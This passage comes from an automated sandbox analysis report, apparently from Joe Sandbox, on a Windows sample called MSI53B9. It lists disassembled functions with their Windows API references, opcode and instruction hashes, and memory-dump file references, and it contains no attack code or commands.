Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 3741668355-2756464174
Opcode ID: c3ccd0fa96e7b5e9ab61dde8df548b477d6ba1aae4b70b8c4ec6fe039cbdebcc
Instruction ID: c073e6238f50eca233a3c9e36f3f34402bc2b21e56e29dfa618f5ce8c4af28ab
Opcode Fuzzy Hash: c3ccd0fa96e7b5e9ab61dde8df548b477d6ba1aae4b70b8c4ec6fe039cbdebcc
Instruction Fuzzy Hash: 0B62BF715002848EDB29DF68C8856EA3BE1FF54304F08857EEC9ECB28ADB71D945CB61

Function 00895B53 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00895C4B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00895C55
UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00895C62

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 73537e58d5f23b48e11f6c0d0dcce5affc9f2588a320f0870ee736954f769ea2
Instruction ID: 42c404d2bb9a4e6448cd3fb13050b9ddd1ad56a41c2d4af707ca62fc1352ee22
Opcode Fuzzy Hash: 73537e58d5f23b48e11f6c0d0dcce5affc9f2588a320f0870ee736954f769ea2
Instruction Fuzzy Hash: 2A319375901328ABCB21EF68D989BDDBBB8FF18710F5041DAE41CA7290E7709B858F45

Function 00897D78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00897F0B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 972c803d848d7161451502695bd6aa4bfca3d572638be9488650000ab102a40e
Instruction ID: 1ad819338e937324e8d51c6c7c0f7b3d2e51f65c5e06ef7d7f23b5152383eba6
Opcode Fuzzy Hash: 972c803d848d7161451502695bd6aa4bfca3d572638be9488650000ab102a40e
Instruction Fuzzy Hash: 7A31D0B19142496FDF24AE78CC84EFA7BBDFF86714F0801A8E519D7251E6309E458B50

Function 00899EB0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
Instruction ID: e899d455b301ae6bf441024110f5efb286fc4e1b46166772e35783c822168383
Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
Instruction Fuzzy Hash: 01021D71E002199FDF18DFA9C8806ADB7F5FF88314F29826AD919E7344D731A9418B91

Function 0088932F Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00889355
GetNumberFormatW.KERNEL32(00000400,00000000,?,008AA154,?,?), ref: 008893A4

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 6977f12d58b56f0940369ccbd65f63099f55d0b594b676b76df615edfe4d2474
Instruction ID: ee93326b31bbb5d83bba39c77c94f7b168c99376b31c97741d56121d1131c9ae
Opcode Fuzzy Hash: 6977f12d58b56f0940369ccbd65f63099f55d0b594b676b76df615edfe4d2474
Instruction Fuzzy Hash: B0015E35640349BAEB109FA4DC05FAB77BCFF0A710F005526BA09D7661E3709919CBA6

Function 0089E8D4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0089E8CF,?,?,00000008,?,?,0089E56F,00000000), ref: 0089EB01

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ceca701ba6179dc90ca2bbdc18708281048f352c1bcf5c93060e8115ce6c7367
Instruction ID: bd8bd508f1986c3d09a91241290ddcff658b425d5cb71a6cf263cba0a86dfad9
Opcode Fuzzy Hash: ceca701ba6179dc90ca2bbdc18708281048f352c1bcf5c93060e8115ce6c7367
Instruction Fuzzy Hash: 16B11931610608DFDB19DF28C48AB657FE1FF45365F298658E89ACF2A1C335E991CB40

Function 00873FC5 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 00874008

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: dbfba00243cd5d614b703de5629ca6ed83393c917429bf6d00552786a583f3bb
Instruction ID: 01e19cbd18f420770c46a4af1eab7a08020bb0b96f2635cb5efd0c9a0dfda133
Opcode Fuzzy Hash: dbfba00243cd5d614b703de5629ca6ed83393c917429bf6d00552786a583f3bb
Instruction Fuzzy Hash: 2DF1D1B2A083418FD748CF29D880A1AFBE1BFC9308F19892EF498D7711D634E9458F56

Function 0087A8E0 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0087A905

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 46acf45148cce9996171aa1e30c39c64a39a01a349a67e6d2d8959757f58455f
Instruction ID: 2f01d5393c58e36ebcf60eb8833b7a9a8aaa4af074704f1397cc8fe00a81f47b
Opcode Fuzzy Hash: 46acf45148cce9996171aa1e30c39c64a39a01a349a67e6d2d8959757f58455f
Instruction Fuzzy Hash: ECF062B49002088BDB2CCF14DC426E977B5F786720F104294DA6993750D3B1DD81CEA2

Function 0088DBC3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0088D604), ref: 0088DBC8

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3a9de65f75986e13ff02e05fb512bcc1ae563caf5eaa476a82a21981c8e5c0f1
Instruction ID: 63ea88730acb7f30963c6f9eb0d36c1e8906c1561581d5dc16951e6cba59bb0c
Opcode Fuzzy Hash: 3a9de65f75986e13ff02e05fb512bcc1ae563caf5eaa476a82a21981c8e5c0f1
Instruction Fuzzy Hash:

Function 00898AAA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00898AAA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2df5d52c6f5284a35248f54de021de5caff1254c31310861d858bc00037597ed
Instruction ID: 50cfe7fa832865893bbfda87ec95ba0f3c1bc3fd7879d95d0422f2603d9ac128
Opcode Fuzzy Hash: 2df5d52c6f5284a35248f54de021de5caff1254c31310861d858bc00037597ed
Instruction Fuzzy Hash: E5A02230A02200CFB3008F32AF0B30C3AF8BA033C0B00802CA008C3330EB308000AF00

Function 00884FB5 Relevance: .8, Instructions: 800COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
Instruction ID: 678166ee2d57d339be61fd2da8ac7fb7bd79c3e49585c3d5690b7467472ce676
Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
Instruction Fuzzy Hash: 5162E671604B899FCB29EF38C8906B9BBE1FF55304F04896ED99ACB346D634E945CB10

Function 008863F2 Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
Instruction ID: 459efa9019c3fa7b508946108f4c1be71cbfb11f8f4aa0511c59e5f4c5f2678b
Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
Instruction Fuzzy Hash: 1962327060478A9FC719EF28C8805B8BBE0FF55308F14866ED99AC7742E730E965CB85

Function 0087E045 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
Instruction ID: e2b03af143a143103ce3ee0580584061f9f758055e8b2b5bf7772e8ebdbc15a9
Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
Instruction Fuzzy Hash: 975249B26087019FC758CF18C891A6AF7E1FFC8304F49892DF5969B255D734E919CB82

Function 00885DB9 Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713e772aeaa5c516db01ea71920bf36a634867898cab53d891e686a11a69bb21
Instruction ID: 48cc22acee7e4d985ce1cf0fd13f0f63fa22127ba54ab50f7073c383adff0f83
Opcode Fuzzy Hash: 713e772aeaa5c516db01ea71920bf36a634867898cab53d891e686a11a69bb21
Instruction Fuzzy Hash: 8012E6B1604B068FC729EF28C9D06B9B3E1FF54308F14892DE597C7A81E774A8A5CB45

Function 0087BA1A Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70d4f24eab11f170dd3377450475ab12c96cfc8edfdbaf08811209af63bfa21
Instruction ID: a061fdca7f08a9284f6caea7de843c346280b0a15c7ba8be247b5849c7dbf87e
Opcode Fuzzy Hash: c70d4f24eab11f170dd3377450475ab12c96cfc8edfdbaf08811209af63bfa21
Instruction Fuzzy Hash: A9F18971A083458FC715CE29C48466ABBE2FFD9714F188A2EF489D7359DB30E9058B42

Function 0088F693 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 7f062a5671ac90828f595c01ee1f7d4cc7b0e04944e8482d7cf2ef3756b29f5f
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 90C19F362050930ADB6D5639853413EBEA1EEA67B131A077DE5B7CB1D6FF20C524D720

Function 0088FAC8 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 93a96c43110abd3c9363ea7566ff51ab860d73cf6420a10b43de20d073c0aa05
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 93C170362091A30ADF6D5639C53403EBEA1EAA67B131A077DD9B6CB1D6FF20C524D720

Function 0088F25E Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 89e71135f15104b79744c7c75cc630897d8d88e28cf0253569456e69b055defe
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 19C1A0362050930ADF6D967A853403EBEA1AEA27B131A077ED5B7CB1D6FF20C524D720

Function 0088EE46 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ae8f1e07cde06171c8321af42f33d5d528d22c7b9bf031a9535128a713899e05
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 3FC180362090934ADF6D563AC53403EBFA1AAA67B131A07BDD5B6CB1C6FF20D524D720

Function 0087D5E4 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed66850edb3e5629a955afca177e3f4961236adcb174bdcb90b3a496b1154a8
Instruction ID: ff3c742f0a0a60dd1f551fd9cc2fc271632c878a7b6fd75f27336c77f1282486
Opcode Fuzzy Hash: 3ed66850edb3e5629a955afca177e3f4961236adcb174bdcb90b3a496b1154a8
Instruction Fuzzy Hash: 7CE1F2B95083948FD344CF69D89086BBBE0BBDA300F49495EF9D597362C234EA15CB62

Function 00882DB5 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
Instruction ID: 279c6d2a21e8a1e1ded6c34e77f54fc99be0d147ff05d26a2971513d2b14d535
Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
Instruction Fuzzy Hash: CA9166B02047498BD728FF68C894BBE73D5FB90304F10092DE69AC7282DAB5DA44C757

Function 00892B78 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dd04280afd63f01108e17e77486281698d63d1f62faca452c1a5f69046b971
Instruction ID: 800b239678d7be21754562b21d44ba66ba0323fce00c0c1318a7c7c940530951
Opcode Fuzzy Hash: 86dd04280afd63f01108e17e77486281698d63d1f62faca452c1a5f69046b971
Instruction Fuzzy Hash: 3E6168B160070CB6DE38BF2C8C95BFE63D8FB12758F1C0A19E842DB691D6119D828356

Function 008830E6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
